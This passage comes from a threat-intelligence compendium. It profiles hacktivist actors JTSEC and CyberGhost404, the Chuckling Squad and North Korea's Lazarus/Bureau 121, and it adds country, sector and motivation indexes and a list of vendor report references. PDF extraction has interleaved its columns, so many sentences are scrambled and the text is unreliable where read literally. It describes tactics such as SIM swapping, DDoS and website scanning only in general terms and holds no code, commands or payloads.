of infecting high-profile targets in order TeamViewer
to exfiltrate sensitive usernames and AnyDesk
passwords and offer it for sale as well. Active Directory
None Identified
None Identified

Targeted
Countries _
Colombia
Ghana
India
United States
Russia
Credential Access Collection Command and Control

T1003 - Credential Dumping T1039 - Data from Network Shared Drive T1219 - Remote Access Tools
191
JTSEC Government Agencies Ideology
Cyber Terrorist
JTSEC3313
JTSEC1333 Hacktivist
JTSEC1 State Sponsored
TAG-HA12
Unknown
Language
20 English, French
DESCRIPTION
JTSEC is a hacktivist threat actor affiliated publishing the results on Pastebin and potential attacker should he decide to
with the Anonymous collective. He is active then sharing them in his personal Twitter target one of them. In addition, he also
at least since the end of 2016. JTSEC has account. The scans are performed for occasionally shares target lists for some
taken part in various hacktivist campaigns reconnaissance purposes, as they retrieve of the campaigns.
over the years. His activity is focused on abundant information about the scanned
scanning websites as part of the campaigns, websites, which can be leveraged by a

None Identified None Identified None Identified
Nmap
SubFinder
wig
Metasploit
Aquatone

China Sudan
Ecuador U
nited Arab
France Emirates
Gabon U
nited
Israel Kingdom
Japan U
nited
Nicaragua States
S
audi Arabia Venezuela
Spain
Canada
CAMPAIGNS
2016 - Present - #OpDeathEathers 2018 in response to the assassination of 2019 - #OpSudan
Cyber campaign against pedophiles and Saudi journalist Jamal Khashoggi in the Hacktivist campaign against Sudanese
child trafficking networks. Saudi consulate in Istanbul. governmental targets.
2017 - 2017 - #OPBeast 2018 - 2018 - #Op_Tibet
2016
Hacktivist cyber campaign against zoophilia Hacktivist cyber campaign against the
and bestiality. Chinese regime in support of Tibet.
2018 - Present - #OpDomesticTerrorism
2017- 2017 - #OpNazi
Hacktivist cyber campaign against Nazi Hacktivist cyber campaign launched
and White Supremacy organizations. by Anonymous in 2017 against white 2016-present
supremacists and the alt-right targets. #OpDeathEathers
2017 - 2018 - #OpSpain/#OpEspana

2018 - Present - #OpGabon
Hacktivist cyber campaign against Spanish
targets. The campaign resurfaced in Hacktivist campaign by Anonymous against
2018 in protest against the arrest of a Gabonese targets in protest against the
hacktivist dubbed AnonXeljomudoX, who alleged ritual killings of Gabonese citizens. 2017
was accused by the Spanish authorities 2018 - Present - #OpIsrael 2017-2017 2017-2017
of attacking Spain’s National Intelligence A pro-Palestinian and anti-Israel cyber #OpBeast #OpNazi
Centre (CNI) during the Catalan elections. campaign which occurs annually on April
2017-2018
2017 - Present - HunterUnit 7 since 2013. OpSpain/#OpEspana
2017-present
Hacktivist cyber campaign against 2018 - Present - #OpKilluminati HunterUnit
pedophiles’ websites. It appears JTSEC 2017-present
Hacktivist campaign against secret societies, #OpIcarus
is the main actor active in this campaign. such as the Freemasonry. 2017-present
2017 - Present - #OpIcarus 2018 - Present - #OpNicaragua
#OpIsis
OpIcarus is a hacktivist cyber operation Hacktivist campaign against the government 2018
launched by Anonymous in 2016 against of Nicaragua in protest against its repression 2018-2018 2018-2018 2018-2018
websites and services associated with the of protest movements in the country. #OpCatalonia #OpFrance #OpJamalKhashoggi
global financial system.
2018 - Present - #OpVenezuela 2018-present
2017 - Present - #OpIsis #OpGabon
2018-present
Hacktivist campaign against the Venezuelan
Hackvitist cyber campaign launched by government. 2018-present
#OpIsrael
Anonymous in 2015 against websites #OpKilluminati

2018-present
and targets associated with the Islamic 2018 - Present - #OpWhales
#OpNicaragua
State (ISIS). Hacktivist campaign against countries 2018-present
#OpVenezuela
engaged in whale hunt, and mainly Japan,
2018 - 2018 - #OpCatalonia 2018-present
Faroe Islands and Norway. #OpWhales
Hacktivist cyber campaign first launched 2019
in 2017 that targets Spanish targets in 2019 - #OpAssange
support of Catalonia’s independence. Hacktivist campaign targeting the government
of Ecuador in response to the extradition
2018 - 2018 - #OpFrance
of WikiLeaks establisher Julian Assange to
Hacktivist campaign first launched by the authorities in the UK. JTSEC has also 2019 2019
Anonymous in solidarity with the Yellow scanned some UK websites in the course #OpAssange #OpChildSafety
Vests Movement (Mouvement des Gilets of this campaign.
Jaunes) in France.
2019 - #OpChildSafety
2018 - 2018 - #OpJamalKhashoggi
Hacktivist campaign against pedophilia-
Hacktivist campaign against Saudi Arabia, related websites.
that was launched by Anonymous in October 2020
193
JTSEC Government Agencies Ideology
Cyber Terrorist
JTSEC3313
JTSEC1333 Hacktivist
JTSEC1 State Sponsored
TAG-HA12
Unknown
Language
20 English, French

China Sudan
Ecuador U
nited Arab
France Emirates
Gabon U
nited
Israel Kingdom
Japan U
nited
Nicaragua States
S
audi Arabia Venezuela
Spain
Canada
Discovery
195
ATK 121 Cyber Criminal Education & Objectives _
CyberGhost404 Financial Services Ideology
Cyber Terrorist
CyberGhost404 Government Agencies
TAG-HA8 Hacktivist
Media
State Sponsored
Unknown
Language
English, Filipino
18
DESCRIPTION
CyberGhost404 is a hacktivist threat actor threat actor has been engaged in several links to the stolen data on Pastebin. On
affiliated with the Anonymous collective. hacktivist campaigns, amongst them one occasion, he has also shared a target
The threat actor has been active at least #OpIsrael, #OpSudan and #OpAssange. list. The threat actor has also claimed to
since March 2018 (when he joined Twitter). He mainly publishes claims he had taken have taken offline additional targets out
The threat actor declares himself as the offline multiple websites, and on several of the context of a hacktivist campaign,
founder of the Filipino hacktivist group occasions, he has claimed to have managed possibly as a display of his capabilities.
dubbed Philippine Cyber Eagles. The to leak data from targeted entities, sharing
CAMPAIGNS
2019 - #OpAssange 2019 - #OpVietnam
Hacktivist campaign targeting the government A hacktivist cyber campaign against the 2018
of Ecuador and targets in the UK in response Vietnamese government and its anti-
to the extradition of WikiLeaks establisher cybercrime authority in retaliation for the
Julian Assange to the authorities in the alleged hacking of many Filipino Facebook
UK. The threat actor has shared a list of accounts by Vietnamese hackers, and in 2018-2019
Ecuadorian governmental websites that demand for their arrest. The threat actor targeting Indian
entities
have been allegedly taken offline, claimed has only shared a link to a target list on
to have taken offline various websites of Pastebin and has not taken responsibility
local councils in the UK, and shared a link for participating in active attacks as part
to an alleged UK local police departments’ of this campaign.
data leak.
2018 - 2019 - targeting Indian entities
2019
2019 - #OpIsrael In November 2018, the threat actor 2019
#OpAssange
A pro-Palestinian and anti-Israel cyber has shared a link to leaked data he
campaign which occurs annually on has extracted from the Indian Institute 2019
April 7 since 2013. The threat actor has of Technology Guwahati, an academic #OpIsrael
claimed to have taken offline several institute situated in the city of Guwahati
2019
Israeli websites. in India. In May 2019, the threat actor #OpSudan
has shared a link to leaked data he has
2019 - #OpSudan extracted from the Cement Corporation 2019
A cyber campaign that supports the protests of India Limited. #OpVietnam
against the Sudanese government. The

threat actor has claimed he has taken 2019 - targeting Philippine entities 2019
offline several Sudanese governmental Throughout 2019, the threat actor has targeting
Philippine entities
2020
websites. claimed he had carried out DDoS attacks
against three Philippine websites.

Custom tools Tools used by multiple adversaries None Identified
Denial of Service ATTACK tool made None Identified
by CyberGhost404 Exploited vulnerabilities
None Identified
None Identified

Targeted
Countries _
Ecuador
India
Israel
Philippines
Sudan
United Kingdom
Vietnam
The Philippines
Collection Impact
T1005 - Data from Local System T1498 - Network Denial of Service
197
CHUCKLING HELLA Media Personal-satisfaction
Cyber Terrorist
CHUCKLING SQUAD Retail
TAG-HA16 Hacktivist
T
HE CHUCKLING State Sponsored
SQUAD
Unknown
Language
Unknown
0
DESCRIPTION
The chuckling Squad is a group of hackers center workers of a specific mobile phone uploading twits via SMS messages. There
in activity since at least of August 2019. operator, into sim-card swapping. The is little known about the hackers and their
The group has targeted and hacked Twitter sim-card swap is a process that moves motives, yet we assume that their activity
accounts of Youtubers and other social media a phone number from one sim-card to is aimed at gaining notoriety among
influencers. Among the attacked influencers another. If a hacker gained access to an hacking related circles. While conducting
were: @KingBach, @shanedawson, @ account owners’ calls and SMS’s together the attacks, the group opened a Discord
jamescharles, @BigJigglyPanda, @zane, with the account credentials, it allows the channel for discussions related to the
@I_AM_WILDCAT, @AmandaCerny @ attacker to get recovery passcodes if such attacks, the account was suspended,
LyricaLemonade,@Etika and last and were requested. After gaining access to the it might have been intended for future
most known account that was hacked is Twitter accounts, the hackers mostly posted activity involving hackers from the group.
@jack, belonging to Twitter CEO Jack twits of offensive nature with anti-Semitic
Dorsey. It was reported that the attacks and racist character. The hackers uploaded
were executed by tricking or bribing call- the twits via an external service that allows
CAMPAIGNS
None identified

None Identified
None Identified
None Identified

Targeted
Countries _
United States
199
BUREAU 121 Financial Services Strategic Support
Cyber Terrorist
HIDDEN COBRA Government Agencies
LAZARUS Hacktivist
Media
State Sponsored Military
Unknown
Language
Unknown
DESCRIPTION
Lazarus is not a single Threat Group. It the collect of intellectual properties The Enemy Collapse Sabotage
represents the Bureau 121 which is one helping the development of weapons of Bureau: tasked with information and
of the eight Bureaus associated to the mass destruction or political espionage. psychological warfare.
Reconnaissance General Bureau. The Cyber Terrorism: in 2013 North A cyber operation involves the interaction
Bureau 121 is the primary office tasked Korea conducted disruptive attacks of these different teams. For example, the
with cyber operations. It was reorganized in on South Korean media and financial Operation Bureau define an objective,
September 2016 and it is now composed of: companies (Operation DarkSeoul) and the Office 35 find a useable exploit,
Lab 110: It is the key cyber unit under the was responsible for the Sony hack link to the Unit 31 develop the backdoor and
RGB; it applies cyberattack techniques the movie "The Interview" in November the lure documents with the help of the
to conduct intelligence operations 2014. These attacks occur before the Enemy Collapse Sabotage Bureau to
• Office 98: Primarily collects information 2016 reorganization of the Bureau create efficient spear-phishing document.
on North Korean defectors, organizations 121 that's why we can't tell which Unit The Unit 56 develop C2 software and
that support them, overseas research is currently responsible of disruptive maintains a C2 infrastructure which will
institutes related to North Korea, and operations. be used by the Lab 110, Unit 180 or Unit
university professors in South Korea. Money theft: On of the mission of the 91 to achieve the objective.
• Office 414: Gathers information on Bureau 121 is the collect of liquidity to Due to this configuration, it is expected
overseas government agencies, public finance these cyber activities and the to find tools and infrastructure overlap
agencies, and private companies. DPKR itself. It is done by spreading between the different operation units.
ransomware like the infamous WannaCry
• Office 35: Office concentrated on
which collected $91.000 and through
developing malware, researching and
bank robbery. The cyber bank robbery is
analyzing vulnerabilities, exploits, and
done by infiltration the banking network
hacking tools.
to steal the SWIFT credentials and use
Unit 180: Unit specialized in conducting these credentials to initiate transaction
cyber operations to steal foreign money to an account controlled by the attacker.
from outside North Korea. The most known is Bangladesh Central
Unit 91: Bank Heist in February 2016 allowing
• focuses on cyberattack missions targeting the theft of $81m. This activity is carried
isolated networks, particularly on South on by the Unit 180, which has similar
Korea’s critical national infrastructure objectives than the North Korean threat
such as KHNP and the ROK Ministry group APT38 aka Stardust Chollima or
of National Defense. BlueNoroff.
• stealing confidential information and The Bureau 121 is supported by other

technology to develop weapons of Units from the General Staff Department:
mass destruction. The Operation Bureau: tacked to define
128 and 413 Liaison Office: Responsible cyber strategies and plan operations
of hacking foreign intelligence websites The Command Automation Bureau,
and train cyber experts. composed of three units:
• U nit 31: responsible for malware
The Bureau 121 conducted three
development (seems redundant with
main types of operations:
the Office 35)
Cyber espionage: The Lazarus Units
conducted multiple cyber espionage • Unit 32: responsible for military software
operations such as the Kimsuki campaign development
and the Operation KHNP. These espionage • Unit 56: responsible for command
operations have different objectives like and control software development
the tracking of North Korean dissidents,

Targeted
Countries _
South Korea
United States
North Korea
“2019, The All-Purpose Sword: North Korea’s Cyber Operations and Strategies”
https://ccdcoe.org/uploads/2019/06/Art_08_The-All-Purpose-Sword.pdf
201
Index _

203
Index _
ORIGINES TARGETS
Argentina - p. 182 Afghanistan - p. 18, 82, 136, 158, 168
Brazil - p. 148, 150, 140 Africa - p. 108
Canada - p. 192 Algerie - p. 42, 136, 140
China - p. 38, 40, 44, 80, 106, 152, 156 Angola - p. 148
Colombia - p. 88 Argentina - p. 66, 88, 140, 176, 168, 182
France - p. 42, 60 Armenia - p. 18, 66, 72, 82
Gaza Strip - p. 58 Australia - p. 22, 88, 116, 134, 152, 184
India - p. 48 Austria - p. 42, 46, 64, 66, 72
Azerbaijan - p. 14, 26, 64, 66, 72, 82
Indonesia - p. 180
Bahamas - p. 140
Iran - p. 26, 64, 76, 114
Bahrain - p. 64
Italy - p. 144, 178
Bangladesh - p. 48, 50, 72, 140, 158, 168
Latina America - p. 176
Barbados - p. 140
Lebanon - p. 94
Belarus - p. 18, 66, 72, 82, 84
North Korea - p. 50, 68, 200
Belgium - p. 14, 18, 82, 84, 176, 184
Pakistan - p. 50
Bolivia - p. 88, 176
Palestinian National Authority - p. 136
Brazil - p. 18, 50, 88, 176, 140, 144, 148, 150, 158,
Peru - p. 88 162, 168
Russia - p. 14, 18, 30, 34, 72, 84, 100, 116, 162, 188, 190 Bulgaria - p. 18, 66
Saudi Arabia - p. 130 Cambodia - p. 40, 140
Serbia - p. 160 Cameroon - p. 168
South Korea - p. 96 Canada - p. 18, 30, 66, 126, 136, 152, 158, 168, 176
Spain - p. 66 Central African Republic - p. 158
Syria - p. 126 Central Asia - p. 44, 64, 84, 108
The Philippines - p. 158, 196 Ceylin - p. 48
Tunisia - p. 184 Chechnya - p. 14
Ukraine - p. 66 Chile - p. 50, 120, 136
China - p. 18, 22, 42, 44, 48, 66, 88, 94, 96, 104,
United Kingdom - p. 160
120, 136, 152, 158, 176, 192
United States - p. 160, 198
Colombia - p. 88, 140, 148, 162, 176, 190
Unknown - p. 4
6, 54, 56, 82, 92, 104, 108, 112,
Congo - p. 172
120, 164, 172
Costa Rica - p. 140
Venezuela - p. 88
Cuba - p. 176, 168
Vietnam - p. 50
Cyprus - p. 72
Worldwide - p. 134, 168
Czech Republic - p. 14, 66, 72
Democratic Republic of the Congo - p. 42
ATTACKS TYPES Denmark - p. 136
C
yber criminal - Djibouti - p. 136
p. 46, 54, 56, 60, 66, 72, 88, 116, 120, 124, 130, Dominican Republik - p. 88, 158
160, 190, 198 Eastern Asia - p. 38, 120
Hacktivist - Eastern Europe - p. 38, 64
p. 8
8, 96, 130, 140, 144, 148, 150, 158, 162, 168,
172, 178, 180, 182, 184, 188, 192, 198, Ecuador - p. 88, 150, 162, 168, 176, 182, 192, 196
S
tates sponsored - Egypt - p. 58, 112, 134, 136, 158
p. 1
4, 18, 22, 26, 30, 34, 38, 40, 42, 44, 48, 50, 58, Estonia - p. 66
64, 68, 76, 80, 82, 84, 92, 94, 96, 100, 104, 106, Europe - p. 42, 48, 54, 84
108, 112, 114, 124, 136, 152, 156, 164, 176, 200 European Union - p. 140
Terrorist - France - p. 30, 60, 84, 88, 94, 116, 126, 134, 140, 144,
p. 126, 134, 136 152, 158, 162, 172, 176, 184, 192

Gabon - p. 158, 172, 192 Oman - p. 136
Georgia - p. 14, 18, 64, 66, 72 Pakistan - p. 64, 82, 88, 94, 158, 184
Germany - p. 1 8, 22, 30, 42, 72, 84, 88, 94, 120, Palestine - p. 136
136, 140, 152, 158, 176 Palestinian Authority - p. 66
Ghana - p. 190 Paraguay - p. 148
Greece - p. 30, 72, 82 Peru - p. 88, 140, 162, 168, 176
Honduras - p. 150, 172 Philippines - p. 22, 40, 44, 50, 80, 88, 94, 156, 158,
Hong Kong - p. 44, 68, 72, 80, 88, 150, 152 196
Hungary - p. 18, 14, 158, 184 Poland - p. 14, 18, 30, 34, 50, 66, 72, 84, 88, 158,
India - p. 6
4, 82, 84, 88, 94, 104, 136, 140, 152, 168
158, 168, 190, 196 Portugal - p. 14
Indonesia - p. 8
0, 104, 140, 148, 150, 158, 162, Qatar - p. 26, 58, 94, 136
180, 188 Romania - p. 14, 18, 66, 72, 84
Iran - p. 18, 42, 64, 76, 82, 84, 88, 112, 136, 158, 164 Russia - p. 34, 42, 50, 64, 66, 72, 82, 84, 88, 94, 96,
Iraq - p. 42, 64, 76, 84, 112, 136 124, 136, 152, 184
Ireland - p. 14, 184 Saudi Arabia - p. 26, 64, 76, 84, 94, 100, 136, 140,
Israel - p. 2
6, 48, 58, 64, 72, 76, 88, 136, 140, 150, 172, 192
150, 162, 168, 172, 180, 184, 192, 196 Serbia - p. 30, 72, 136
Italy - p. 3
0, 66, 82, 84, 88, 94, 120, 144, 158, 162, Singapore - p. 92, 152, 158
178 Slovakia - p. 18
Japan - p. 18, 48, 68, 96, 106, 140, 152, 158, 192 Slovenia - p. 136
Jordan - p. 58, 64, 66, 84, 94, 112, 136 Somalia - p. 136
Kazakhstan - p. 14, 18, 66, 72, 82, 84, 88 South Africa - p. 108
Kenya - p. 72 South America - p. 18, 38, 120
Kurdistan - p. 112 South China Sea - p. 48
Kuwait - p. 26, 58, 66, 88, 108, 112, 136, 168 South Korea - p. 18, 48, 68, 76, 88, 94, 96, 106,
Kyrgystan - p. 14, 66, 72 136, 152, 168, 200
Latvia - p. 18, 72, 136 Southest Asia - p. 22, 40, 38, 48, 92, 104, 120
Lebanon - p. 26, 94, 112, 136 Southern Asia - p. 64, 104
Lybia - p. 136 Spain - p. 14, 18, 30, 44, 66, 88, 124, 140, 162, 172,
Luxembourg - p. 14 176, 192
Macedonia - p. 136 Sri Lanka - p. 48
Malaysia - p. 18, 42, 50, 66, 72, 104, 134, 158 Sudan - p. 140, 148, 150, 162, 168, 172, 188, 192, 196
Mali - p. 64, 158 Sweden - p. 18, 42, 88
Malta - p. 116 Switzerland - p. 18, 46, 72, 82, 88, 94, 124
Mauritius - p. 26 Syria - p. 42, 94, 114, 136, 168
Mexico - p. 50, 88, 120, 140, 158, 182 Taiwan - p. 50, 66, 72, 80, 88, 96, 106, 120, 152,
156, 158
Middle East - p. 38, 64, 68, 84, 112, 114, 164
Tajikistan - p. 18, 66, 84
Moldova - p. 66
Thailand - p. 66, 94, 158, 168, 184
Mongolia - p. 18
Tibet - p. 44
Montenegro - p. 18
Tunisia - p. 158, 184
Morocco - p. 42, 82, 88, 112, 136
Turkey - p. 14, 18, 26, 30, 42, 44, 50, 64, 66, 72, 88,
Myanmar - p. 168 136, 168
Nepal - p. 94, 158, 168 Turkmenistan - p. 82
Netherlands - p. 18, 42, 66, 84, 88, 94 Uganda - p. 14, 82
Nicaragua - p. 140, 150, 172, 176, 192 Ukraine - p. 14, 18, 34, 42, 66, 72, 82, 88, 176
Nigeria - p. 158 United Arab Emirates - p. 64, 82, 88, 136, 140, 192
North America - p. 56, 64, 120 Unitetd Kingdom - p. 18, 30, 40, 42, 44, 48 , 66, 72,
North Korea - p. 50, 96 76, 84, 124, 126, 130, 134, 136, 140, 148,
Norway - p. 30 150, 152, 158, 160, 168, 184, 192, 196
205
Index _
United Unions - p. 168 Financial services -

United S
tates - p. 14, 18, 22, 26, 30, 40, 42, 44, 48, p. 22, 26, 38, 48, 50, 64, 66, 72, 76, 88, 94, 104, 116
50, 54, 58, 64, 66, 76, 82, 84, 88, 94, 116, 120, 136, 140, 144, 148, 150, 152, 160, 168, 172,
124, 126, 130, 134, 136, 140, 148, 152, 156 184, 190, 192, 196, 200
158, 160, 168, 176, 184, 190, 198, 200 Food and agriculture -
Uruguay - p. 50, 88 p. 56, 144, 148, 158, 188, 190
Uzbekistan - p. 14, 72, 84 Government Agencies -
p. 14, 18, 22, 26, 38, 40, 44, 48, 58, 64, 72, 76, 80,
Venezuela - p. 88, 94, 140, 150, 158, 172, 176, 192
82, 84, 88, 94, 96, 104, 106, 124, 126, 134, 136,
Vietnam - p. 22, 50, 66, 68, 72, 80, 82, 94, 156, 196 140 144, 148, 150, 152, 158, 162, 164, 168, 172
Western Europe - p. 38, 40, 64, 120 176, 178, 180, 182, 184, 188, 190, 192, 196, 200
Yemen - p. 136 Healthcare -
Zimbabwe - p. 168, 172 p. 56, 64, 68, 76, 88, 92, 94, 144, 148, 158, 160,
178, 184, 188
High-Teck -
SECTORS p. 22, 26, 38, 64, 66, 68 76, 84, 88, 106, 116, 126,
Administration - 130, 136, 152, 156, 160, 162, 178, 180
p. 22, 58, 88, 96, 144, 158, 160, 162, 178, 188 Hospitality -
Aerospace - p. 18, 26, 54, 56, 88, 116, 144, 162, 184
p. 18, 44, 68, 76, 82, 84, 88, 106, 136, 156, 184, 200 Industry -
Aviation - p. 152
p. 26, 30, 48, 76, 88, 134, 144, 158, 184, 190 International organizations -
Bank - p. 14, 18, 22, 40, 42, 64, 84, 88, 94, 104, 140, 144,
p. 46 148, 168, 182
C
asino and gaming - Labor Unions -
p. 88, 116, 130, 160 p. 178
Chemicals - Legal services -

p. 68, 76 p. 22, 94, 160
Communication - Manufacturing -
p. 2
2, 44, 76, 80, 88, 104 , 116, 126, 130, 140, 148, p. 22, 44, 68, 76, 88, 94, 144, 158, 160, 162, 178, 19
156, 168, 176, 178, 180, 184, 198 Maritime and shipbuilding -
Construction - p. 106
p. 184 Media -
Cybersecurity - p. 18, 22, 38, 42, 50, 58, 64, 66, 76, 88, 92, 94, 106
p. 18, 88, 140, 178, 180, 190 112, 126, 130, 134, 136, 144, 150, 152, 160, 168,
178, 184, 188, 196, 198, 200
Defense -
p. 1
4, 18, 38, 44, 58, 64, 76, 84, 88, 94, 96, 104, 106 Military -
126, 134, 136, 140, 144, 150, 152, 156, 158, 162, p. 22, 42, 58, 80, 82, 88, 96, 104, 126, 134, 144,
176, 178, 188 158, 168, 176, 178, 188, 200
Dissident - Naval -
p. 76 p. 22, 40, 44, 88, 134, 144, 160
Education - Non-governemental organizations -

p. 2
6, 44, 58, 64, 76, 80, 88, 94, 116, 134, 140, 144, p. 48
148, 150, 152, 158, 160, 162, 168, 178, 184, 188, Pharmaceutical -
190, 196 p. 88, 144, 160, 178
Embassies - Political organizations -
p. 18, 48 p. 44, 48, 58, 84, 88, 96, 112, 126, 134, 140, 144
Energy - 158, 162, 168, 178, 182, 184
p. 2
6, 30, 34, 38, 48, 54, 64, 76, 82, 100, 108, 116, Public sector -
136, 162, 176, 182, 188, 190 p. 48
Engineering - Research -
p. 92 p. 22, 76, 82, 84, 88 ,144, 162, 178
Entertainment - Retail -
p. 56 p. 54, 56, 66, 88, 116, 126, 144, 158, 162, 190, 198

Software -
p. 48
Telecommunication -
p. 92
Transportation -
p. 58, 68, 88, 144, 158, 178, 188, 190, 198
Unknown -
p. 114
End users -
p. 60
MOTIVATIONS
Attacks on industrial security systems almost
exclusively with destructive intent -
p. 100, 108
Coercion -
p. 94, 126, 130
Cyber espionage -
p. 26, 34, 42, 82, 176
Data Theft -
p. 42, 84, 104, 156
Dominance -
p. 126, 130
Espionage -
p. 18, 22, 30, 38, 40, 42, 44, 64, 68, 76, 80, 84, 92,
96, 106, 112, 114, 152, 156, 164
Financial gain -
p. 46, 50, 54, 56, 60, 66, 72, 88, 94, 116, 120, 124,
126, 130, 134, 160, 190
Ideology -
p. 58, 88, 94, 126, 134, 136, 140, 144, 148, 150, 162
168, 172, 178, 180, 182, 184, 188, 192, 196
Notoriety -
p. 50, 88, 126, 134
Personal-satisfaction -
p. 130, 140, 158, 198
Political manipulation -
p. 18
Revenge -
p. 126, 130, 134, 184
Sabotage -
p. 34
Startegic support -
p. 200
Unpredictable -
p. 94, 126, 134, 140, 158, 178
207
References _

209
References _
ATK1 Infrastructure in Bundestag, https://netzpolitik.org/2015/digital-

28/07/2014, TrendMicro, ESILE Targeted Attack Campaign attack-on-german-parliament-investigative-report-on-the-hack-
Hits APAC Governments of-the-left-party-infrastructure-in-bundestag/
16/06/2015, PaloAlto, Operation Lotus Blossom 08/09/2015, F-Secure, Sofacy Recycles Carberp and Metasploit
Code, https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-
17/06/2015, Securelist, The Spring Dragon APT - More Intrusion carberp-and-metasploit-code/
Techniques Rolled In
04/12/2015, Kaspersky, Sofacy APT hits high profile targets
18/12/2015, PaloAlto, Attack on French Diplomat Linked to with updated toolset, https://securelist.com/sofacy-apt-hits-high-
Operation Lotus Blossom profile-targets-with-updated-toolset/72924/
23/12/2015, pwc, ELISE: Security Through Obesity 17/12/2015, Bitdefender, APT28 Under the Scope, https://
03/02/2016, PaloAlto, Emissary Trojan Changelog: Did Operation download.bitdefender.com/resources/media/materials/white-papers/
Lotus Blossom Cause It to Evolve? en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_
Political_Cyber-Espionage.pdf
24/07/2017, Securelist, Spring Dragon – Updated Activity
14/06/2016, PaloAlto, New Sofacy Attacks Against US Government
27/01/2018, Accenture Security, DragonFish Delivers New Form Agency, https://unit42.paloaltonetworks.com/unit42-new-sofacy-
Of Elise Malware Targeting Asean Defence Ministers' Meeting attacks-against-us-government-agency/
And Associates
16/06/2016, Dell Secureworks, Threat Group 4127 Targets Hillary
13/02/2018, RSA, Lotus Blossom Continues ASEAN Targeting Clinton Presidential Campaign, https://www.secureworks.com/
research/threat-group-4127-targets-hillary-clinton-presidential-
ATK2 campaign
7/09/2013, Symantec, Hidden Lynx – ProfessionalHackers for
1 20/07/2016, PaloAlto, Technical Walkthrough: Office Test
Hire, https://www.symantec.com/content/en/us/enterprise/media/ Persistence Method Used In Recent Sofacy Attacks, https://unit42.
security_response/whitepapers/hidden_lynx.pdf paloaltonetworks.com/unit42-technical-walkthrough-office-test-
1/09/2013, FireEye, Operation DeputyDog: Zero-Day (CVE-
2 persistence-method-used-in-recent-sofacy-attacks/
2013-3893) Attack Against Japanese Targets, https://www.fireeye. 13/09/2016, WADA, WADA Confirms Attack by Russian Cyber
com/blog/threat-research/2013/09/operation-deputydog-zero- Espionage Group, https://www.wada-ama.org/en/media/news/2016-
day-cve-2013-3893-attack-against-japanese-targets.html 09/wada-confirms-attack-by-russian-cyber-espionage-group
2/09/2013, FireEye, Operation DeputyDog Part 2: Zero-Day
2 26/09/2016, PaloAlto, Sofacy’s ‘Komplex’ OS X Trojan, https://
Exploit Analysis (CVE-2013-3893), https://www.fireeye.com/ unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/
blog/threat-research/2013/09/operation-deputydog-part-2-
zero-day-exploit-analysis-cve-2013-3893.html 17/10/2016, PaloAlto, ‘DealersChoice’ is Sofacy’s Flash Player
Exploit Platform, https://unit42.paloaltonetworks.com/unit42-
0/11/2013, FireEye, Operation Ephemeral Hydra: IE Zero-Day
1 dealerschoice-sofacys-flash-player-exploit-platform/
Linked to DeputyDog Uses Diskless Method, https://www.fireeye.
com/blog/threat-research/2013/11/operation-ephemeral-hydra- 20/10/2016, ESET, En Route with Sednit Part 1, https://www.
ie-zero-day-linked-to-deputydog-uses-diskless-method.html welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-
part1.pdf
3/02/2014, FireEye, Operation SnowMan: DeputyDog Actor
1
Compromises US Veterans of Foreign Wars Website, https:// 25/10/2016, ESET, En Route with Sednit Part 2, https://www.
www.fireeye.com/blog/threat-research/2014/02/operation- welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-
snowman-deputydog-actor-compromises-us-veterans-of-foreign- part-2.pdf
wars-website.html 26/10/2016, ESET, En Route with Sednit Part 3, https://www.
4/05/2015, FireEye, Hiding in Plain Sight: FireEye and Microsoft
1 welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-
Expose Obfuscation Tactic, https://www2.fireeye.com/rs/fireye/ part3.pdf
images/APT17_Report.pdf 22/12/2016, CrowdStrike, Use of Fancy Bear Android Malware In
MITRE ATT&CK, APT28, https://attack.mitre.org/groups/G0007/ Tracking Of Ukrainian Filed Artillery Units, https://www.crowdstrike.
com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf
7/10/2014, FireEye, APT28: A WINDOW INTO RUSSIA’S CYBER
2
ESPIONAGE OPERATIONS?, https://www.fireeye.com/content/ 29/12/2016, NCCIC, GRIZZLY STEPPE – Russian Malicious Cyber
dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf Activity, https://www.us-cert.gov/sites/default/files/publications/
JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
7/10/2014, TrendMicro, Operation Pawn Storm, https://www.
2
trendmicro.de/cloud-content/us/pdfs/security-intelligence/white- 11/01/2017, FireEye, APT28: At The Center Of The Storm,
papers/wp-operation-pawn-storm.pdf https://www2.fireeye.com/rs/848-DID-242/images/APT28-
Center-of-Storm-2017.pdf
4/02/2015, TrendMicro, Pawn Storm Update: iOS Espionage
0
App Found, https://blog.trendmicro.com/trendlabs-security- 14/02/2017, PaloAlto, XAgentOSX: Sofacy’s XAgent macOS
intelligence/pawn-storm-update-ios-espionage-app-found/ Tool, https://unit42.paloaltonetworks.com/unit42-xagentosx-
sofacys-xagent-macos-tool/
6/04/2015, TrendMicro, Operation Pawn Storm Ramps Up its
1
Activities; Targets NATO, White House, https://blog.trendmicro. 25/04/2017, TrendMicro, Two Years of Pawn Storm, https://
com/trendlabs-security-intelligence/operation-pawn-storm-ramps- documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-
up-its-activities-targets-nato-white-house/ storm.pdf
8/04/2015, FireEye, Operation RussianDoll: Adobe &
1 1/08/2017, FireEye, APT28 Targets Hospitality Sector, Presents
1
Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 Threat to Travelers, https://www.fireeye.com/blog/threat-
in Highly-Targeted Attack, https://www.fireeye.com/blog/threat- research/2017/08/apt28-targets-hospitality-sector.html
research/2015/04/probable_apt28_useo.html 22/10/2017, Talos, “Cyber Conflict” Decoy Document Used In
9/06/2015, NETZPOLITIK.ORG, Digital Attack on German
1 Real Cyber Conflict, https://blog.talosintelligence.com/2017/10/
Parliament: Investigative Report on the Hack of the Left Party cyber-conflict-decoy-document.html

7/11/2017, McAfee, Threat Group APT28 Slips Office Malware
0 3/05/2019, Kaspersky, ScarCruft continues to evolve, introduces
1
into Doc Citing NYC Terror Attack, https://securingtomorrow. Bluetooth harvester, https://securelist.com/scarcruft-continues-to-
mcafee.com/other-blogs/mcafee-labs/apt28-threat-group- evolve-introduces-bluetooth-harvester/90729/
adopts-dde-technique-nyc-attack-theme-in-latest-campaign/
0/02/2018, Kaspersky, A Slice of 2017 Sofacy Activity, https://
2 ATK5
